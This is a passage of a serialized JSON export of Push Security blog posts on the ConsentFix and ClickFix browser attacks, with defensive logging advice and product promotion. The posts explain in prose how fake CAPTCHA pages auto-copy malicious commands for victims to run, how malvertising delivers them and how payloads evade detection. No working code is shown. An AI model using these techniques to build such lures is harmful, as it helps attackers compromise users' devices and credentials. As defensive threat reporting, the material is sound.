this attack. At the same time, the attack exploits default Microsoft security configs to evade both prevention and detection controls.",[],{},{"nodeType":178,"data":20314,"content":20315},{},[20316],{"nodeType":173,"value":20317,"marks":20318,"data":20319},"To be able to tackle modern attacks like ConsentFix that occur entirely within the browser context, it is vital that organizations look to monitor the browser as a detection surface, hunt for signs of malicious activity, and block attacks in real-time — in the same way that you would expect EDR to work for endpoint attacks. ",[],{},{"nodeType":178,"data":20321,"content":20322},{},[20323],{"nodeType":173,"value":20324,"marks":20325,"data":20326},"For organizations relying on Microsoft logging as the sole line of defense against this attack, there are some new recommendations to add to the list thanks to the community response: ",[],{},{"nodeType":250,"data":20328,"content":20329},{},[20330,20353,20363,20384],{"nodeType":254,"data":20331,"content":20332},{},[20333],{"nodeType":178,"data":20334,"content":20335},{},[20336,20340,20349],{"nodeType":173,"value":20337,"marks":20338,"data":20339},"Ensure that logging for the deprecated ",[],{},{"nodeType":186,"data":20341,"content":20343},{"uri":20342},"https://learn.microsoft.com/en-us/azure/azure-monitor/reference/tables/aadgraphactivitylogs",[20344],{"nodeType":173,"value":20345,"marks":20346,"data":20348},"AADGraphActivityLogs",[20347],{"type":194},{},{"nodeType":173,"value":20350,"marks":20351,"data":20352}," is enabled.",[],{},{"nodeType":254,"data":20354,"content":20355},{},[20356],{"nodeType":178,"data":20357,"content":20358},{},[20359],{"nodeType":173,"value":20360,"marks":20361,"data":20362},"Hunt in logs for the Application IDs highlighted above, along with the Resource IDs for Windows Azure Active Directory (00000002-0000-0000-c000-000000000000) and Microsoft Intune Checkin (26a4ae64-5862-427f-a9b0-044e62572a4f)",[],{},{"nodeType":254,"data":20364,"content":20365},{},[20366],{"nodeType":178,"data":20367,"content":20368},{},[20369,20372,20380],{"nodeType":173,"value":37,"marks":20370,"data":20371},[],{},{"nodeType":186,"data":20373,"content":20374},{"uri":12080},[20375],{"nodeType":173,"value":20376,"marks":20377,"data":20379},"Create Service Principals for each of the vulnerable apps and restrict the users that are authorized to access them",[20378],{"type":194},{},{"nodeType":173,"value":20381,"marks":20382,"data":20383}," to reduce the attack surface of users that can be phished with this method.",[],{},{"nodeType":254,"data":20385,"content":20386},{},[20387],{"nodeType":178,"data":20388,"content":20389},{},[20390],{"nodeType":173,"value":20391,"marks":20392,"data":20393},"Block access to CLI tools via Conditional Access policy and issue exclusions for authorized users/groups. ",[],{},{"nodeType":178,"data":20395,"content":20396},{},[20397,20401,20410,20414,20421],{"nodeType":173,"value":20398,"marks":20399,"data":20400},"Additional resources that may be of use include community-created ",[],{},{"nodeType":186,"data":20402,"content":20404},{"uri":20403},"https://github.com/elastic/detection-rules/pull/5485",[20405],{"nodeType":173,"value":20406,"marks":20407,"data":20409},"Elastic detection rules",[20408],{"type":194},{},{"nodeType":173,"value":20411,"marks":20412,"data":20413}," for ConsentFix and further mitigation and hunting guidance from ",[],{},{"nodeType":186,"data":20415,"content":20416},{"uri":19768},[20417],{"nodeType":173,"value":19771,"marks":20418,"data":20420},[20419],{"type":194},{},{"nodeType":173,"value":197,"marks":20422,"data":20423},[],{},{"nodeType":231,"data":20425,"content":20426},{},[],{"nodeType":169,"data":20428,"content":20429},{},[20430],{"nodeType":173,"value":20431,"marks":20432,"data":20434},"Learn more about Push Security",[20433],{"type":370},{},{"nodeType":178,"data":20436,"content":20437},{},[20438],{"nodeType":173,"value":8525,"marks":20439,"data":20440},[],{},{"nodeType":178,"data":20442,"content":20443},{},[20444],{"nodeType":173,"value":20445,"marks":20446,"data":20447},"Push tackles browser-based attacks using behavioral threat detection controls, powered by deep browser telemetry, to provide broad detection and blocking capabilities against attacks happening in the browser. This means analyzing the end-to-end process of a webpage loading/running in the browser, and how the user interacts with the page, to spot universal indicators of bad activity. ",[],{},{"nodeType":178,"data":20449,"content":20450},{},[20451],{"nodeType":173,"value":20452,"marks":20453,"data":20454},"This is the only reliable way to detect malicious websites in a world where IoC-based detections are trivial for attackers to get around. Rather than playing known-bad whac-a-mole, Push detects and blocks even zero-day browser threats in real time.",[],{},{"nodeType":178,"data":20456,"content":20457},{},[20458],{"nodeType":173,"value":20459,"marks":20460,"data":20461},"Push stops browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, ClickFix, ConsentFix, and session hijacking. You don’t need to wait until it all goes wrong either — you can also use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your identity attack surface.",[],{},{"nodeType":178,"data":20463,"content":20464},{},[20465,20468,20475,20478,20485],{"nodeType":173,"value":1451,"marks":20466,"data":20467},[],{},{"nodeType":186,"data":20469,"content":20470},{"uri":1456},[20471],{"nodeType":173,"value":1459,"marks":20472,"data":20474},[20473],{"type":194},{},{"nodeType":173,"value":1464,"marks":20476,"data":20477},[],{},{"nodeType":186,"data":20479,"content":20480},{"uri":1469},[20481],{"nodeType":173,"value":1472,"marks":20482,"data":20484},[20483],{"type":194},{},{"nodeType":173,"value":1477,"marks":20486,"data":20487},[],{},{"nodeType":312,"data":20489,"content":20493},{"target":20490},{"sys":20491},{"id":20492,"type":317,"linkType":318},"4D7zpYAc1tTEAmn2hpkWPe",[],{"nodeType":178,"data":20495,"content":20496},{},[20497],{"nodeType":173,"value":37,"marks":20498,"data":20499},[],{},"ConsentFix debrief: latest community insights, recommendations, and predictions","New insights on the ConsentFix campaign stopped by Push.","2026-01-14T00:00:00.000Z","consentfix-debrief",{"items":20505},[20506,20508],{"sys":20507,"name":509},{"id":508},{"sys":20509,"name":505},{"id":504},{"items":20511},[20512],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":20513},{"url":1496},{"__typename":1528,"sys":20515,"content":20517,"title":21090,"synopsis":21091,"hashTags":118,"publishedDate":21092,"slug":21093,"tagsCollection":21094,"authorsCollection":21100},{"id":20516},"7rVNBW6rYXnXMpI0JEwzgR",{"json":20518},{"nodeType":165,"data":20519,"content":20520},{},[20521,20528,20535,20547,20552,20559,20562,20570,20577,20583,20599,20606,20629,20636,20642,20645,20653,20685,20691,20710,20716,20735,20742,20748,20751,20759,20766,20786,20793,20813,20820,20826,20829,20837,20844,20877,20884,20891,20937,20955,20965,20972,20975,20983,21003,21010,21017,21023,21026,21033,21053,21079,21084],{"nodeType":178,"data":20522,"content":20523},{},[20524],{"nodeType":173,"value":20525,"marks":20526,"data":20527},"ClickFix attacks have skyrocketed in the last year. This social engineering attack has established itself as a key part of the modern attacker’s toolkit, tricking victims into running malicious code on their device.",[],{},{"nodeType":178,"data":20529,"content":20530},{},[20531],{"nodeType":173,"value":20532,"marks":20533,"data":20534},"As we showcased in our last webinar and at our threat briefing in London earlier this month, ClickFix is evolving fast, in terms of the web pages themselves, the delivery mechanisms by which they are sent to victims, and the nature of the payload and its execution.",[],{},{"nodeType":178,"data":20536,"content":20537},{},[20538,20542],{"nodeType":173,"value":20539,"marks":20540,"data":20541},"One particular example stood out to us in our research. ",[],{},{"nodeType":173,"value":20543,"marks":20544,"data":20546},"So, is this the most advanced ClickFix you’ve seen?",[20545],{"type":370},{},{"nodeType":312,"data":20548,"content":20551},{"target":20549},{"sys":20550},{"id":8032,"type":317,"linkType":318},[],{"nodeType":178,"data":20553,"content":20554},{},[20555],{"nodeType":173,"value":20556,"marks":20557,"data":20558},"Let’s break it down further.",[],{},{"nodeType":231,"data":20560,"content":20561},{},[],{"nodeType":169,"data":20563,"content":20564},{},[20565],{"nodeType":173,"value":20566,"marks":20567,"data":20569},"How ClickFix pages are evolving",[20568],{"type":370},{},{"nodeType":178,"data":20571,"content":20572},{},[20573],{"nodeType":173,"value":20574,"marks":20575,"data":20576},"The CloudFlare-based lure is a great example of how ClickFix pages themselves are evolving — and becoming increasingly convincing to users. ",[],{},{"nodeType":312,"data":20578,"content":20582},{"target":20579},{"sys":20580},{"id":20581,"type":317,"linkType":318},"4wJOgtofImjbsekyXMc5Ec",[],{"nodeType":178,"data":20584,"content":20585},{},[20586,20590,20595],{"nodeType":173,"value":20587,"marks":20588,"data":20589},"This is an incredibly slick example — ",[],{},{"nodeType":173,"value":20591,"marks":20592,"data":20594},"it almost looks like Cloudflare shipped a new kind of bot check service. ",[20593],{"type":370},{},{"nodeType":173,"value":20596,"marks":20597,"data":20598},"The embedded video, countdown timer, and counter for “users verified in the last hour” all serve to increase the sense of authenticity, and put extra pressure on the victim to complete the check. ",[],{},{"nodeType":178,"data":20600,"content":20601},{},[20602],{"nodeType":173,"value":20603,"marks":20604,"data":20605},"There are a couple of extra things happening under the hood here, too:",[],{},{"nodeType":250,"data":20607,"content":20608},{},[20609,20619],{"nodeType":254,"data":20610,"content":20611},{},[20612],{"nodeType":178,"data":20613,"content":20614},{},[20615],{"nodeType":173,"value":20616,"marks":20617,"data":20618},"The page is adapting to the device that you’re visiting from, serving up instructions specific to the user’s Mac (increasingly common as ClickFix expands to support different Operating Systems).",[],{},{"nodeType":254,"data":20620,"content":20621},{},[20622],{"nodeType":178,"data":20623,"content":20624},{},[20625],{"nodeType":173,"value":20626,"marks":20627,"data":20628},"The page is automatically copying the malicious code to the user’s clipboard via JavaScript (which we see in 9/10 cases).",[],{},{"nodeType":178,"data":20630,"content":20631},{},[20632],{"nodeType":173,"value":20633,"marks":20634,"data":20635},"For the past decade or more, user awareness has focused on stopping users from clicking links in suspicious emails, downloading risky files, and entering their username and password into random websites. It hasn’t focused on opening up a program and running a command — so it’s no surprise that this kind of highly convincing page is so effective at duping victims into following the instructions. ",[],{},{"nodeType":312,"data":20637,"content":20641},{"target":20638},{"sys":20639},{"id":20640,"type":317,"linkType":318},"LiVIyGxdAaUXUfvKjD6ON",[],{"nodeType":231,"data":20643,"content":20644},{},[],{"nodeType":169,"data":20646,"content":20647},{},[20648],{"nodeType":173,"value":20649,"marks":20650,"data":20652},"How ClickFix delivery methods are evolving",[20651],{"type":370},{},{"nodeType":178,"data":20654,"content":20655},{},[20656,20660,20668,20672,20681],{"nodeType":173,"value":20657,"marks":20658,"data":20659},"There’s also the fact that this page wasn’t accessed via email. The top delivery vector for ClickFix attacks that we’ve observed is, in fact, Google Search — in the form of ",[],{},{"nodeType":186,"data":20661,"content":20662},{"uri":8043},[20663],{"nodeType":173,"value":20664,"marks":20665,"data":20667},"poisoned search results and malicious advertising (malvertising)",[20666],{"type":194},{},{"nodeType":173,"value":20669,"marks":20670,"data":20671},". Attackers are either taking over legitimate sites (there’s a ",[],{},{"nodeType":186,"data":20673,"content":20675},{"uri":20674},"https://www.bleepingcomputer.com/news/security/hackers-launch-mass-attacks-exploiting-outdated-wordpress-plugins/",[20676],{"nodeType":173,"value":20677,"marks":20678,"data":20680},"steady supply of website hosting and CMS vulnerabilities",[20679],{"type":194},{},{"nodeType":173,"value":20682,"marks":20683,"data":20684}," to take advantage of) or simply vibe-coding their own sites and optimizing them for various search terms. ",[],{},{"nodeType":312,"data":20686,"content":20690},{"target":20687},{"sys":20688},{"id":20689,"type":317,"linkType":318},"6N9EmH6AaN6Hr4xk6ozATR",[],{"nodeType":178,"data":20692,"content":20693},{},[20694,20698,20707],{"nodeType":173,"value":20695,"marks":20696,"data":20697},"And because most anti-phishing controls are implemented via email, by using ",[],{},{"nodeType":186,"data":20699,"content":20701},{"uri":20700},"https://pushsecurity.com/blog/why-attackers-are-moving-beyond-email-based-phishing?utm_source=thehackernews&utm_medium=sponsored-content&utm_term=article",[20702],{"nodeType":173,"value":20703,"marks":20704,"data":20706},"non-email delivery vectors, an entire layer of detection opportunity is cut out",[20705],{"type":194},{},{"nodeType":173,"value":197,"marks":20708,"data":20709},[],{},{"nodeType":312,"data":20711,"content":20715},{"target":20712},{"sys":20713},{"id":20714,"type":317,"linkType":318},"1CWsZlLFX9TS53J1uamOG8",[],{"nodeType":178,"data":20717,"content":20718},{},[20719,20723,20731],{"nodeType":173,"value":20720,"marks":20721,"data":20722},"But even when they are sent via email, ClickFix pages, like other modern phishing sites, are using a range of ",[],{},{"nodeType":186,"data":20724,"content":20726},{"uri":20725},"https://pushsecurity.com/blog/phishing-detection-evasion-launch?utm_source=thehackernews&utm_medium=sponsored-content&utm_term=article",[20727],{"nodeType":173,"value":8157,"marks":20728,"data":20730},[20729],{"type":194},{},{"nodeType":173,"value":20732,"marks":20733,"data":20734}," that prevent them being flagged by security tools — from email scanners, to web-crawling security tools, to web proxies analyzing network traffic. Detection evasion mainly involves camouflaging and rotating domains to stay ahead of known-bad detections (i.e. blocklists), using bot protection to prevent analysis, and heavily obfuscating page content to stop detection signatures firing. ",[],{},{"nodeType":178,"data":20736,"content":20737},{},[20738],{"nodeType":173,"value":20739,"marks":20740,"data":20741},"Finally, because the code is copied inside the browser sandbox, typical security tools are unable to observe and flag this action as potentially malicious. This means that the last — and only — opportunity for organizations to stop ClickFix is on the endpoint, after the user has attempted to run the malicious code.",[],{},{"nodeType":312,"data":20743,"content":20747},{"target":20744},{"sys":20745},{"id":20746,"type":317,"linkType":318},"3HiqpIBWWMr5FMi3IBzXcc",[],{"nodeType":231,"data":20749,"content":20750},{},[],{"nodeType":169,"data":20752,"content":20753},{},[20754],{"nodeType":173,"value":20755,"marks":20756,"data":20758},"How ClickFix payloads are evolving",[20757],{"type":370},{},{"nodeType":178,"data":20760,"content":20761},{},[20762],{"nodeType":173,"value":20763,"marks":20764,"data":20765},"It’s not just the ClickFix page and delivery mechanisms that are evolving — the services where code is being run, and the type of payload, are also increasingly varied. ",[],{},{"nodeType":178,"data":20767,"content":20768},{},[20769,20773,20782],{"nodeType":173,"value":20770,"marks":20771,"data":20772},"While the main payloads observed by Push are mshta and PowerShell, ",[],{},{"nodeType":186,"data":20774,"content":20776},{"uri":20775},"https://mhaggis.github.io/ClickGrab/techniques.html",[20777],{"nodeType":173,"value":20778,"marks":20779,"data":20781},"attackers are abusing a wide range of LOLBINS",[20780],{"type":194},{},{"nodeType":173,"value":20783,"marks":20784,"data":20785}," targeting different services across Operating Systems.",[],{},{"nodeType":178,"data":20787,"content":20788},{},[20789],{"nodeType":173,"value":20790,"marks":20791,"data":20792},"While it is possible to disable the Win+R dialog box and limit the applications that can be run from the File Explorer address bar, it is not possible to similarly restrict users from interacting with other legitimate services to run malicious commands. ",[],{},{"nodeType":178,"data":20794,"content":20795},{},[20796,20800,20809],{"nodeType":173,"value":20797,"marks":20798,"data":20799},"Another recent example termed ",[],{},{"nodeType":186,"data":20801,"content":20803},{"uri":20802},"https://expel.com/blog/cache-smuggling-when-a-picture-isnt-a-thousand-words/",[20804],{"nodeType":173,"value":20805,"marks":20806,"data":20808},"cache smuggling",[20807],{"type":194},{},{"nodeType":173,"value":20810,"marks":20811,"data":20812}," was also identified by security researchers. This technique combines a ClickFix approach with JavaScript that caches a malicious file posing as a JPG. This means that the ClickFix command executes locally — effectively getting an entire zip file onto the local system without the PowerShell command needing to make any web requests.",[],{},{"nodeType":178,"data":20814,"content":20815},{},[20816],{"nodeType":173,"value":20817,"marks":20818,"data":20819},"Finally, it’s worth considering the future of ClickFix. The current attack path straddles browser and endpoint — what if it could take place entirely in the browser and evade EDR altogether? ",[],{},{"nodeType":312,"data":20821,"content":20825},{"target":20822},{"sys":20823},{"id":20824,"type":317,"linkType":318},"2rUDKawJnrmZVtxfNcSNha",[],{"nodeType":231,"data":20827,"content":20828},{},[],{"nodeType":169,"data":20830,"content":20831},{},[20832],{"nodeType":173,"value":20833,"marks":20834,"data":20836},"What’s the impact of ClickFix evolution?",[20835],{"type":370},{},{"nodeType":178,"data":20838,"content":20839},{},[20840],{"nodeType":173,"value":20841,"marks":20842,"data":20843},"To summarize:",[],{},{"nodeType":250,"data":20845,"content":20846},{},[20847,20857,20867],{"nodeType":254,"data":20848,"content":20849},{},[20850],{"nodeType":178,"data":20851,"content":20852},{},[20853],{"nodeType":173,"value":20854,"marks":20855,"data":20856},"ClickFix pages are becoming increasingly sophisticated, making it more likely that victims will fall for the social engineering.",[],{},{"nodeType":254,"data":20858,"content":20859},{},[20860],{"nodeType":178,"data":20861,"content":20862},{},[20863],{"nodeType":173,"value":20864,"marks":20865,"data":20866},"ClickFix delivery is evading traditional monitoring controls at the email layer to reach victims. ",[],{},{"nodeType":254,"data":20868,"content":20869},{},[20870],{"nodeType":178,"data":20871,"content":20872},{},[20873],{"nodeType":173,"value":20874,"marks":20875,"data":20876},"ClickFix payloads are becoming more varied and are finding new ways to evade security controls. ",[],{},{"nodeType":178,"data":20878,"content":20879},{},[20880],{"nodeType":173,"value":20881,"marks":20882,"data":20883},"This means that EDR-based interception of malware execution is the last — and only — real line of defense for most organizations, kicking in after the initial script has been run (typically acting as a stager for the real malware). ",[],{},{"nodeType":178,"data":20885,"content":20886},{},[20887],{"nodeType":173,"value":20888,"marks":20889,"data":20890},"Malware execution can and should be intercepted by EDR, but it’s not foolproof. ",[],{},{"nodeType":250,"data":20892,"content":20893},{},[20894,20917,20927],{"nodeType":254,"data":20895,"content":20896},{},[20897],{"nodeType":178,"data":20898,"content":20899},{},[20900,20904,20913],{"nodeType":173,"value":20901,"marks":20902,"data":20903},"Attackers are constantly ",[],{},{"nodeType":186,"data":20905,"content":20907},{"uri":20906},"https://www.infostealers.com/article/logins-zip-leverages-chromium-zero-day-stealthy-infostealer-builder-promises-99-credential-theft-in-under-12-seconds/",[20908],{"nodeType":173,"value":20909,"marks":20910,"data":20912},"developing new tools and capabilities",[20911],{"type":194},{},{"nodeType":173,"value":20914,"marks":20915,"data":20916}," to bypass EDR in the cat-and-mouse game between attackers and defenders.",[],{},{"nodeType":254,"data":20918,"content":20919},{},[20920],{"nodeType":178,"data":20921,"content":20922},{},[20923],{"nodeType":173,"value":20924,"marks":20925,"data":20926},"Because ClickFix attacks are user initiated, context might be missing that lead to the alert being misclassified. This can mean the difference between the level of priority alert that is raised, and whether or not it is automatically blocked.",[],{},{"nodeType":254,"data":20928,"content":20929},{},[20930],{"nodeType":178,"data":20931,"content":20932},{},[20933],{"nodeType":173,"value":20934,"marks":20935,"data":20936},"If you’re an organization that allows employees and contractors to use unmanaged BYOD devices, there’s a strong chance that there are gaps in your EDR coverage.",[],{},{"nodeType":178,"data":20938,"content":20939},{},[20940,20944,20951],{"nodeType":173,"value":20941,"marks":20942,"data":20943},"This is why attackers are doubling down. According to the ",[],{},{"nodeType":186,"data":20945,"content":20946},{"uri":1252},[20947],{"nodeType":173,"value":20948,"marks":20949,"data":20950},"2025 Microsoft Digital Defense report",[],{},{"nodeType":173,"value":20952,"marks":20953,"data":20954},", ClickFix was the most common initial access method in the last year, accounting for 47% of attacks. That's a pretty significant stat.",[],{},{"nodeType":3769,"data":20956,"content":20957},{},[20958],{"nodeType":178,"data":20959,"content":20960},{},[20961],{"nodeType":173,"value":20962,"marks":20963,"data":20964},"47% of attacks started with ClickFix in the last year, according to Microsoft.",[],{},{"nodeType":178,"data":20966,"content":20967},{},[20968],{"nodeType":173,"value":20969,"marks":20970,"data":20971},"Ultimately, organizations are leaving themselves relying on a single line of defense — if the attack isn’t detected and blocked by EDR, it isn’t spotted at all. ",[],{},{"nodeType":231,"data":20973,"content":20974},{},[],{"nodeType":169,"data":20976,"content":20977},{},[20978],{"nodeType":173,"value":20979,"marks":20980,"data":20982},"Don’t gamble on a single point of failure ",[20981],{"type":370},{},{"nodeType":178,"data":20984,"content":20985},{},[20986,20990,20999],{"nodeType":173,"value":20987,"marks":20988,"data":20989},"Push Security’s latest feature, ",[],{},{"nodeType":186,"data":20991,"content":20993},{"uri":20992},"https://pushsecurity.com/blog/introducing-malicious-copy-paste-detection?utm_source=thehackernews&utm_medium=sponsored-content&utm_term=article",[20994],{"nodeType":173,"value":20995,"marks":20996,"data":20998},"malicious copy and paste detection",[20997],{"type":194},{},{"nodeType":173,"value":21000,"marks":21001,"data":21002},", tackles ClickFix-style attacks at the earliest opportunity through browser-based detection and blocking. This is a universally effective control that works regardless of the lure delivery channel, page style and structure, or the specifics of the malware type and execution.",[],{},{"nodeType":178,"data":21004,"content":21005},{},[21006],{"nodeType":173,"value":21007,"marks":21008,"data":21009},"Unlike heavy-handed DLP solutions that block copy-paste altogether, Push protects your employees without disrupting their user experience or hampering productivity.",[],{},{"nodeType":178,"data":21011,"content":21012},{},[21013],{"nodeType":173,"value":21014,"marks":21015,"data":21016},"By adding a new layer of protection in the browser, security teams can reduce the strain on their EDR and reduce the risk of host-based controls being bypassed through misconfiguration or attacker innovation. ",[],{},{"nodeType":312,"data":21018,"content":21022},{"target":21019},{"sys":21020},{"id":21021,"type":317,"linkType":318},"sALkMt8UbTZ2f34hKvGLj",[],{"nodeType":231,"data":21024,"content":21025},{},[],{"nodeType":169,"data":21027,"content":21028},{},[21029],{"nodeType":173,"value":18605,"marks":21030,"data":21032},[21031],{"type":370},{},{"nodeType":178,"data":21034,"content":21035},{},[21036,21040,21049],{"nodeType":173,"value":21037,"marks":21038,"data":21039},"If you want to learn more about ClickFix attacks and how they’re evolving, ",[],{},{"nodeType":186,"data":21041,"content":21043},{"uri":21042},"https://pushsecurity.com/resources/clickfix",[21044],{"nodeType":173,"value":21045,"marks":21046,"data":21048},"check out our latest webinar (now available on-demand!)",[21047],{"type":194},{},{"nodeType":173,"value":21050,"marks":21051,"data":21052}," where we dive into real-world ClickFix examples and demonstrate how ClickFix sites work under the hood. ",[],{},{"nodeType":178,"data":21054,"content":21055},{},[21056,21059,21066,21069,21076],{"nodeType":173,"value":1451,"marks":21057,"data":21058},[],{},{"nodeType":186,"data":21060,"content":21061},{"uri":1456},[21062],{"nodeType":173,"value":1459,"marks":21063,"data":21065},[21064],{"type":194},{},{"nodeType":173,"value":1464,"marks":21067,"data":21068},[],{},{"nodeType":186,"data":21070,"content":21071},{"uri":1469},[21072],{"nodeType":173,"value":1472,"marks":21073,"data":21075},[21074],{"type":194},{},{"nodeType":173,"value":1477,"marks":21077,"data":21078},[],{},{"nodeType":312,"data":21080,"content":21083},{"target":21081},{"sys":21082},{"id":20640,"type":317,"linkType":318},[],{"nodeType":178,"data":21085,"content":21086},{},[21087],{"nodeType":173,"value":37,"marks":21088,"data":21089},[],{},"The most advanced ClickFix yet?","Breaking down the most sophisticated ClickFix page we’ve seen in the wild — and what it tells us about the future of malicious copy-and-paste attacks. ","2025-11-06T00:00:00.000Z","the-most-advanced-clickfix-yet",{"items":21095},[21096,21098],{"sys":21097,"name":509},{"id":508},{"sys":21099,"name":505},{"id":504},{"items":21101},[21102],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":21103},{"url":1496},{"__typename":1528,"sys":21105,"content":21106,"title":19633,"synopsis":21724,"hashTags":118,"publishedDate":21725,"slug":19634,"tagsCollection":21726,"authorsCollection":21732},{"id":18678},{"json":21107},{"nodeType":165,"data":21108,"content":21109},{},[21110,21155,21212,21227,21232,21239,21242,21250,21257,21264,21271,21291,21298,21304,21322,21328,21331,21339,21346,21354,21373,21380,21387,21394,21402,21409,21416,21422,21429,21462,21468,21476,21495,21502,21525,21532,21539,21545,21552,21555,21563,21577,21596,21603,21610,21617,21622,21630,21649,21652,21659,21666,21673,21680,21687,21713,21718],{"nodeType":178,"data":21111,"content":21112},{},[21113,21117,21125,21129,21138,21142,21151],{"nodeType":173,"value":21114,"marks":21115,"data":21116},"One of the biggest security trends in the past year has been the emergence of the attack technique known as ",[],{},{"nodeType":186,"data":21118,"content":21120},{"uri":21119},"https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/",[21121],{"nodeType":173,"value":1845,"marks":21122,"data":21124},[21123],{"type":194},{},{"nodeType":173,"value":21126,"marks":21127,"data":21128},". Various reports indicate that ClickFix is fast becoming one of the most prevalent attack techniques this year, with ",[],{},{"nodeType":186,"data":21130,"content":21132},{"uri":21131},"https://www.scworld.com/news/clickfix-phishing-links-increased-nearly-400-in-12-months-report-says",[21133],{"nodeType":173,"value":21134,"marks":21135,"data":21137},"one study",[21136],{"type":194},{},{"nodeType":173,"value":21139,"marks":21140,"data":21141}," reporting that email-based ClickFix attacks have increased by 400% YOY, and ",[],{},{"nodeType":186,"data":21143,"content":21145},{"uri":21144},"https://web-assets.esetstatic.com/wls/en/papers/threat-reports/eset-threat-report-h12025.pdf",[21146],{"nodeType":173,"value":21147,"marks":21148,"data":21150},"another",[21149],{"type":194},{},{"nodeType":173,"value":21152,"marks":21153,"data":21154}," highlighting a 517% increase in the past 6 months. ",[],{},{"nodeType":178,"data":21156,"content":21157},{},[21158,21162,21171,21174,21183,21186,21195,21199,21208],{"nodeType":173,"value":21159,"marks":21160,"data":21161},"ClickFix is known to be regularly used by the Interlock ransomware group and other prolific threat actors. A number of recent public data breaches have been linked to ClickFix attacks as the attack vector, such as ",[],{},{"nodeType":186,"data":21163,"content":21165},{"uri":21164},"https://www.bleepingcomputer.com/news/security/kettering-health-confirms-interlock-ransomware-behind-cyberattack/",[21166],{"nodeType":173,"value":21167,"marks":21168,"data":21170},"Kettering Health",[21169],{"type":194},{},{"nodeType":173,"value":2936,"marks":21172,"data":21173},[],{},{"nodeType":186,"data":21175,"content":21177},{"uri":21176},"https://www.bleepingcomputer.com/news/security/interlock-ransomware-claims-davita-attack-leaks-stolen-data/",[21178],{"nodeType":173,"value":21179,"marks":21180,"data":21182},"DaVita",[21181],{"type":194},{},{"nodeType":173,"value":2936,"marks":21184,"data":21185},[],{},{"nodeType":186,"data":21187,"content":21189},{"uri":21188},"https://www.infosecurity-magazine.com/news/st-paul-mayor-interlock-data-leak/",[21190],{"nodeType":173,"value":21191,"marks":21192,"data":21194},"City of St. Paul, Minnesota",[21193],{"type":194},{},{"nodeType":173,"value":21196,"marks":21197,"data":21198},", and the ",[],{},{"nodeType":186,"data":21200,"content":21202},{"uri":21201},"https://www.blackfog.com/texas-tech-cyberattack-1-4m-records-compromised/",[21203],{"nodeType":173,"value":21204,"marks":21205,"data":21207},"Texas Tech University Health Sciences Centers",[21206],{"type":194},{},{"nodeType":173,"value":21209,"marks":21210,"data":21211}," (with many more breaches likely to involve ClickFix where the attack vector wasn’t known or disclosed).",[],{},{"nodeType":178,"data":21213,"content":21214},{},[21215,21219,21223],{"nodeType":173,"value":21216,"marks":21217,"data":21218},"Push’s latest feature, ",[],{},{"nodeType":173,"value":20995,"marks":21220,"data":21222},[21221],{"type":370},{},{"nodeType":173,"value":21224,"marks":21225,"data":21226},", tackles ClickFix-style attacks at the earliest opportunity through browser-based detection, with a universally effective control that works regardless of the lure delivery channel, or page style and structure. ",[],{},{"nodeType":312,"data":21228,"content":21231},{"target":21229},{"sys":21230},{"id":21021,"type":317,"linkType":318},[],{"nodeType":178,"data":21233,"content":21234},{},[21235],{"nodeType":173,"value":21236,"marks":21237,"data":21238},"Before we get into the specifics of the feature, let’s take a look at what ClickFix is and why it poses a detection and response challenge to security teams.",[],{},{"nodeType":231,"data":21240,"content":21241},{},[],{"nodeType":169,"data":21243,"content":21244},{},[21245],{"nodeType":173,"value":21246,"marks":21247,"data":21249},"ClickFix 101",[21248],{"type":370},{},{"nodeType":178,"data":21251,"content":21252},{},[21253],{"nodeType":173,"value":21254,"marks":21255,"data":21256},"ClickFix attacks prompt the user to solve some kind of problem or challenge in the browser — most commonly a CAPTCHA, but also things like fixing an error on a webpage. The name is a little misleading though — the key factor in the attack is that they trick users into running malicious commands on their device by copying malicious code from the page clipboard and running it locally. (For simplicity we’ll keep calling it ClickFix, but we’re not happy about it.)",[],{},{"nodeType":178,"data":21258,"content":21259},{},[21260],{"nodeType":173,"value":21261,"marks":21262,"data":21263},"The copy action is either performed manually by the user, or automatically by the page. Manual copies typically include additional social engineering to lure the victim into hitting CTRL+C, while automatic copies are performed using JavaScript running on the page. Most ClickFix pages we've seen are automatic copies, which makes sense — fewer steps means the user is more likely to follow the instruction.",[],{},{"nodeType":178,"data":21265,"content":21266},{},[21267],{"nodeType":173,"value":21268,"marks":21269,"data":21270},"Most commonly, these attacks are used to deliver remote access software or infostealer malware using stolen session cookies and credentials to facilitate attacks on business apps and services. From there, the attacker simply dumps the data and holds the victim to ransom for its deletion — often dropping ransomware afterwards for double the extortion. ",[],{},{"nodeType":178,"data":21272,"content":21273},{},[21274,21278,21287],{"nodeType":173,"value":21275,"marks":21276,"data":21277},"The attack gives the victim instructions that involve clicking prompts and copying, pasting, and running commands directly in the Windows Run dialog box, Terminal, or PowerShell in order to “fix” the fake problem that they’re experiencing. Variants such as ",[],{},{"nodeType":186,"data":21279,"content":21281},{"uri":21280},"https://mrd0x.com/filefix-clickfix-alternative/",[21282],{"nodeType":173,"value":21283,"marks":21284,"data":21286},"FileFix",[21285],{"type":194},{},{"nodeType":173,"value":21288,"marks":21289,"data":21290}," have also emerged which instead use the File Explorer Address Bar to execute OS commands.",[],{},{"nodeType":178,"data":21292,"content":21293},{},[21294],{"nodeType":173,"value":21295,"marks":21296,"data":21297},"Links to malicious ClickFix pages are distributed over various delivery channels, with attacks shifting from traditional email-based delivery to social media, instant messaging apps, malicious ads in places like Google Search, and using in-app notifications and messages across numerous SaaS services. ",[],{},{"nodeType":312,"data":21299,"content":21303},{"target":21300},{"sys":21301},{"id":21302,"type":317,"linkType":318},"1I9ERDY2tuspw5zVMV5DbY",[],{"nodeType":178,"data":21305,"content":21306},{},[21307,21311,21318],{"nodeType":173,"value":21308,"marks":21309,"data":21310},"ClickFix comes in a variety of lures, including impersonating CAPTCHA, Cloudflare Turnstile, simulating an error loading a webpage, and many more. They have also been observed targeting a ",[],{},{"nodeType":186,"data":21312,"content":21313},{"uri":20775},[21314],{"nodeType":173,"value":21315,"marks":21316,"data":21317},"wide range of services",[],{},{"nodeType":173,"value":21319,"marks":21320,"data":21321}," to execute code. 